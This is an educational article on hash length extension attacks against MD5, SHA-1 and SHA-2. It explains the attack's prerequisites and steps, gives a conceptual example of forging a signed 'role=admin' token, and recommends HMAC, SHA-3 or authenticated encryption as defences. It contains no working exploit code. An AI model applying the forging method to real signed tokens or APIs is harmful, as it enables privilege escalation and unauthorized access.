Cybersecurity: Length Extension Attack
A length extension attack exploits a structural weakness in certain cryptographic hash functions, allowing attackers to append data to a message and generate a valid hash without knowing the original message or secret key. This vulnerability affects popular algorithms like MD5, SHA-1, and SHA-256 due to their Merkle-Damgård construction. The attack compromises message integrity and authentication, making modified messages appear authentic.
Key Points
- Vulnerable algorithms:
MD5,SHA-1,SHA-256, andSHA-512are susceptible due to Merkle-Damgård construction - Attack requirements: Original hash value, message length (or estimate), and knowledge of padding rules
- Attack mechanism: Uses the final hash as an internal state to continue hashing with appended data
- Security impact: Compromises integrity and authentication, not confidentiality
- Primary defense: Use
HMAC(Hash-based Message Authentication Code) orSHA-3
How the Vulnerability Works
The Merkle-Damgård construction processes data in sequential blocks, maintaining an internal state that passes from one block to the next. The final hash output is simply the internal state after processing the last block.
This design creates an exploitable weakness:
- The final hash reveals the internal state of the hash function
- This state can be used as a starting point to continue hashing
- An attacker can append new data and produce a valid hash
- No knowledge of the original message or secret key is required
Critical Insight: The hash function cannot distinguish between a genuine message and one that has been extended using this technique.
Attack Prerequisites
Hash of the Original Message
The attacker must obtain the hash value, which represents the final internal state after processing the original message. This is often publicly available or transmitted over networks.
Message Length
The attacker needs to know or estimate the length of the original message. This can be:
- Determined from application behavior or API responses
- Guessed based on common patterns (e.g., standard token formats)
- Brute-forced if the range is limited
Padding Rules
Hash functions apply standardized padding to messages. For MD5, SHA-1, and SHA-256, these padding rules are publicly documented and predictable, making them easy to reconstruct.
Step-by-Step Attack Process
- Obtain the original hash - Capture the hash representing the internal state
- Reconstruct the padding - Apply the same padding rules the hash function used
- Initialize with the hash - Use the obtained hash as the starting internal state
- Append malicious data - Add the attacker's chosen content after the padding
- Continue hashing - Process the new data blocks using the hash function's algorithm
- Generate valid hash - Produce a legitimate hash for the extended message
Practical Example
Legitimate Scenario
Message: secret_key + "user=alice&role=user"
Hash: abc123def456...
The application calculates a hash to verify message integrity and authenticity.
Attack Scenario
Original: secret_key + "user=alice&role=user"
Original Hash: abc123def456...
Attacker reconstructs:
secret_key + "user=alice&role=user" + [padding]
Attacker appends: "&role=admin"
Extended message:
secret_key + "user=alice&role=user" + [padding] + "&role=admin"
New valid hash: xyz789ghi012...
Result: The system accepts the modified message as authentic because the hash validates correctly, even though the attacker never knew the secret_key. The attacker has successfully escalated privileges from user to admin.
Why This Attack Succeeds
The vulnerability exists because of four key factors:
- Exposed internal state: The hash output directly reveals the internal state
- Stateless continuation: Nothing prevents using this state to process additional blocks
- Predictable padding: Standard padding rules are publicly known and easily reconstructed
- No finalization: The hash function doesn't cryptographically "seal" the final state
The hash function treats these two scenarios identically:
- A message that naturally ends at a certain point
- A message that has been artificially extended after that point
Vulnerable Hash Functions
| Hash Function | Vulnerability Status | Notes |
|---|---|---|
MD5 | Highly vulnerable | Also broken for collision resistance; deprecated |
SHA-1 | Highly vulnerable | Structurally weak; phased out in modern systems |
SHA-256 | Vulnerable | Cryptographically strong but still susceptible |
SHA-512 | Vulnerable | Same Merkle-Damgård weakness as SHA-256 |
SHA-3 | Not vulnerable | Uses Keccak sponge construction |
Important: Even cryptographically strong functions like
SHA-256remain vulnerable to length extension attacks when used for message authentication without proper construction like HMAC.
Mitigation Strategies
Use HMAC (Recommended)
HMAC completely prevents length extension attacks through its double-hashing construction:
HMAC(K, M) = H((K ⊕ opad) || H((K ⊕ ipad) || M))
Why HMAC works:
- The internal state after processing the message is not the final output
- The secret key is processed both before and after the message
- The nested structure prevents attackers from using the output to continue hashing
- Standardized and widely supported across programming languages
Alternative Approaches
Use SHA-3: Based on the Keccak sponge construction, SHA-3 is inherently immune to length extension attacks due to its fundamentally different design.
Use authenticated encryption: Employ schemes like AES-GCM or ChaCha20-Poly1305 that provide both encryption and authentication.
Append key at the end: Use H(M || K) instead of H(K || M). This is less secure than HMAC and not recommended for production systems.
Real-World Analogy
Imagine a document with a wax seal:
Secure system: The seal covers the entire document edge, making additions obvious.
Length extension attack:
- You see only the final seal impression (the hash)
- You can add pages to the document
- You can recreate an identical seal for the extended document
- The recipient believes all pages are original
The recipient has no way to distinguish between the original sealed document and your extended version because the seal itself provides the information needed to continue sealing.
Security Implications
This attack compromises:
- Message integrity: Modified messages appear unaltered and valid
- Authentication: Forged messages seem to come from legitimate sources
- Authorization: Attackers can escalate privileges or modify permissions
- API security: Signed API requests can be manipulated to perform unauthorized actions
Note: This is not a confidentiality attack. The original message content remains unknown to the attacker. The vulnerability affects integrity and authentication only.
Common Vulnerable Scenarios
API authentication: Systems using hash(secret + request_data) for API signatures
Cookie signing: Web applications using hash(secret + cookie_value) to prevent tampering
Token generation: Authentication tokens created with hash(secret + user_data)
File integrity: Systems verifying file integrity with hash(key + file_content)
Summary
Length extension attacks exploit the Merkle-Damgård construction by using the hash output as an internal state to continue processing additional data. While MD5, SHA-1, SHA-256, and SHA-512 are vulnerable when used directly for message authentication, proper use of HMAC completely neutralizes this threat. Modern applications should always use HMAC, SHA-3, or authenticated encryption schemes rather than raw hash functions for message authentication purposes.